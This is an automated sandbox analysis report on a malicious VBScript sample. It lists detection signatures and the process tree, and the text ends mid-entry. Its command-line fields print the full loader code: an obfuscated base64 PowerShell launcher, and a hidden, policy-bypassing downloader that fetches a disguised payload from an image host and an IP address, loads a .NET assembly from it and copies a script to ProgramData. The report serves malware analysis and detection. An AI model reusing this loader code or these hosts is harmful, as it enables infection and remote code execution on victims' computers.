Edit tour

Windows Analysis Report
dereac.vbe

Overview

General Information

Sample name:	dereac.vbe
Analysis ID:	1391738
MD5:	3d1704a957f700472678bc83d9d6abcb
SHA1:	493d07d67ae25cd468c23ed446341512aa5d8d83
SHA256:	8bbe9ce696b004ed6b45f992470d99e093c4d463c7d1bdc80d50f071ab164a85
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Snort IDS alert for network traffic

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Script Initiated Connection to Non-Local Network

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Wscript starts Powershell (via cmd or directly)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Found URL in obfuscated visual basic script code

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Script Initiated Connection

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 5612 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\dereac.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 4600 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreGMDgTrebgB2DgTreGgDgTreLwBLDgTreEoDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTrecgBlDgTreGQDgTrebgBvDgTreHcDgTrecwByDgTreGUDgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBODgTreGEDgTrebQBlDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3564 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} } MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 6392 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 2036 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

wscript.exe (PID: 7072 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\Name.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 4600	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x12fad3:$b2: ::FromBase64String( 0x130396:$b2: ::FromBase64String( 0x131417:$b2: ::FromBase64String( 0x1319cb:$b2: ::FromBase64String( 0x1320a1:$b2: ::FromBase64String( 0x13260e:$b2: ::FromBase64String( 0x185920:$b2: ::FromBase64String( 0x12f938:$b3: ::UTF8.GetString( 0x1301fb:$b3: ::UTF8.GetString( 0x13127c:$b3: ::UTF8.GetString( 0x131830:$b3: ::UTF8.GetString( 0x131f06:$b3: ::UTF8.GetString( 0x132473:$b3: ::UTF8.GetString( 0xa3a85:$s1: -join 0x115947:$s1: -join 0x44804:$s3: reverse 0x44af2:$s3: reverse 0x4520c:$s3: reverse 0x459c5:$s3: reverse 0x4cb70:$s3: reverse 0x4cf8a:$s3: reverse
Process Memory Space: powershell.exe PID: 3564	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x57cb:$b2: ::FromBase64String( 0x5d2d:$b2: ::FromBase64String( 0x70f6:$b2: ::FromBase64String( 0x7660:$b2: ::FromBase64String( 0x7dd4:$b2: ::FromBase64String( 0x84f9:$b2: ::FromBase64String( 0x8b0c:$b2: ::FromBase64String( 0x1fde7:$b2: ::FromBase64String( 0x202d9:$b2: ::FromBase64String( 0x2534a:$b2: ::FromBase64String( 0x2653b:$b2: ::FromBase64String( 0x2ea40:$b2: ::FromBase64String( 0x54b40:$b2: ::FromBase64String( 0x551f4:$b2: ::FromBase64String( 0x580b8:$b2: ::FromBase64String( 0x5861a:$b2: ::FromBase64String( 0x59085:$b2: ::FromBase64String( 0x5630:$b3: ::UTF8.GetString( 0x5b92:$b3: ::UTF8.GetString( 0x6f5b:$b3: ::UTF8.GetString( 0x74c5:$b3: ::UTF8.GetString(

Sigma Signatures

Spreading

Sigma detected: Powershell download payload from hardcoded c2 list

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTre

Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - 